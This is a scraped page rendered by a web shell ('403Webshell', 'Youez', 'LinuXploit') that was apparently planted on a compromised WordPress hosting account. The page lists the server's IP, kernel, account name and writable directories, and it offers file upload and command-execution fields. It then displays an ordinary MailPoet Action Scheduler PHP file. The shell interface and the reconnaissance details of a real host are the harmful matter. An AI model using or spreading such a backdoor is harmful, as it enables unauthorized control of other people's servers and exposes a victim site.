403Webshell
Server IP : 172.67.158.161  /  Your IP : 3.140.186.206
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/thietke365.net/wp-content/plugins/mailpoet/vendor/woocommerce/action-scheduler/deprecated/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/thietke365.net/wp-content/plugins/mailpoet/vendor/woocommerce/action-scheduler/deprecated/ActionScheduler_Schedule_Deprecated.php
<?php
if (!defined('ABSPATH')) exit;
abstract class ActionScheduler_Schedule_Deprecated implements ActionScheduler_Schedule {
 public function next( DateTime $after = null ) {
 if ( empty( $after ) ) {
 $return_value = $this->get_date();
 $replacement_method = 'get_date()';
 } else {
 $return_value = $this->get_next( $after );
 $replacement_method = 'get_next( $after )';
 }
 _deprecated_function( __METHOD__, '3.0.0', __CLASS__ . '::' . $replacement_method ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 return $return_value;
 }
}

Youez - 2016 - github.com/yon3zu
LinuXploit